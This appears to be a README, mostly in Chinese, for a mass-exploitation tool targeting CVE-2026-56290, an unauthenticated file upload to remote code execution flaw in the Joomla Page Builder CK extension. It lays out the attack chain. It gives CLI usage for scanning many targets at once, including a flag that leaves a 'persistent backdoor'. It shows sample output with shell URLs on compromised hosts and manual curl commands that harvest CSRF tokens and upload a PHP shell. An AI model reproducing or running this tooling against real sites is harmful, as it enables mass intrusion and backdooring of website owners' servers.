
📤 针对 CVE-2026-56290 的大规模利用框架 —— Page Builder CK Joomla 未授权文件上传至 RCE
CVE-2026-56290 是 Page Builder CK(com_pagebuilderck)中的一个严重级漏洞。Page Builder CK 是一款流行的 Joomla 页面构建器扩展。browse.ajaxAddPicture 控制器方法接受未认证的文件上传,并允许使用用户可控的目标路径,攻击者可以将任意 PHP 文件写入 Web 可访问的目录。
// browse.php controller — NO authentication check
function ajaxAddPicture() {
$input = JFactory::getApplication()->input;
$file = $input->files->get('file', null); // ← user-controlled file
$path = trim($input->get('path', '')); // ← user-controlled path, only trim()!
// ... uploads file to $path without validating the destination
}
path 参数仅仅经过 trim() 清洗 — 没有白名单、没有目录穿越检查、也没有身份验证门槛。再加上可从任何 Joomla 页面公开访问的 CSRF token,攻击者可以远程将 PHP shell 上传到任意可写目录。
| 向量 | 严重级别 | 影响 |
|---|---|---|
| 未认证文件上传 | 9.8(严重) | 任意 PHP 代码执行 |
| CSRF Token 收集 | 5.3(中危) | 使上传链成为可能 |
| 信息泄露 | 5.3(中危) | 扩展版本指纹识别 |
1. HIT Joomla homepage → harvest CSRF token (hex32 + value "1")
2. POST file upload → task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in → media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL → code executes, RCE confirmed
5. POST f=@file to shell → upload additional tools
6. GET ?cleanup=1 → shell self-destructs
| Page Builder CK 版本 | 状态 | 备注 |
|---|---|---|
| 3.1.1 及以下 | 🔴 易受攻击 | 已确认未认证上传 |
| 3.4.10 及以下 | 🔴 易受攻击 | 根据分析扩展的范围 |
| 3.5.10 及以下 | 🔴 易受攻击 | 可能存在部分已修复变体 |
| > 3.5.10 | 🟢 可能已修复 | 通过 manifest XML 验证 |
注意: 版本通过 Joomla manifest 文件
/administrator/manifests/files/com_pagebuilderck.xml检测。如果 manifest 不可访问,扫描器将默认把目标视为潜在易受攻击。
🔍 侦察
|
💀 利用
|
# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit
# Install dependencies
pip install -r requirements.txt
# Verify
python cve_2026_56290.py --help
requests>=2.28.0
urllib3>=1.26.0
CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator
-t, --target Single target URL
-f, --file File with target URLs (one per line, # for comments)
-o, --output Live TXT output file (default: cve-2026-56290_live.txt)
--json JSON report file path (default: cve-2026-56290_report.json)
--threads Concurrent workers (default: 20)
--timeout Request timeout in seconds (default: 15)
--no-cleanup Leave shells on target (persistent backdoor)
-v, --verbose Verbose endpoint discovery output
--known-endpoint Skip discovery: task,file_param,folder_param
# Single target
python cve_2026_56290.py -t https://target.com
# Mass scan from file
python cve_2026_56290.py -f targets.txt
# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v
# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup
# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"
# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored
$ python cve_2026_56290.py -f targets.txt -o live_results.txt
────────────────────────────────────────────────────────────
CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
Live TXT: live_results.txt
2026-07-04 15:30:00
────────────────────────────────────────────────────────────
✅ https://target-vuln.com [rce_confirmed] 12.4s
PBCK: 3.4.7 [VULN]
RCE : ext=php | path=media/com_pagebuilderck/gfonts/
Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
Usage: POST f=@file | ?cleanup=1
EP : task=browse.ajaxAddPicture | file=file | folder=path
🛡️ https://target-patched.com [patched] 3.2s
✅ https://target-vuln2.com [rce_confirmed] 15.1s
PBCK: 3.1.0 [VULN]
RCE : ext=pHP | path=media/com_pagebuilderck/fonts/
Shell: https://target-vuln2.com/media/com_pagebuilderck/fonts/pbck_x7k2m4v9.pHP
Usage: POST f=@file | ?cleanup=1
EP : task=browse.ajaxAddPicture | file=file | folder=path
==================================================
SCAN SUMMARY
==================================================
Total : 5
✅ RCE Confirmed : 2
⚠️ RCE Failed : 1
🛡️ Patched : 1
🔍 Need Diff : 0
❌ Not Joomla : 0
⏭️ No Component : 1
💥 Errors : 0
==================================================
步骤 1 — 获取 CSRF Token
curl -sk 'https://target.com/' | grep -oP 'name="[a-f0-9]{32}" value="1"'
# name="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6" value="1"
步骤 2 — 上传 PHP Shell
TOKEN="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"
curl -sk \
-F "[email protected];type=application/x-php" \
-F "path=media/com_pagebuilderck/gfonts/" \
"https://target.com/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&${TOKEN}=1"
步骤 3 — 验证 RCE
curl -sk 'https://target.com/media/com_pagebuilderck/gfonts/shell.php'
# → PHP shell output, confirms code execution
扫描器部署一个自包含的上传器 shell — 无需 exec()、system() 或 eval():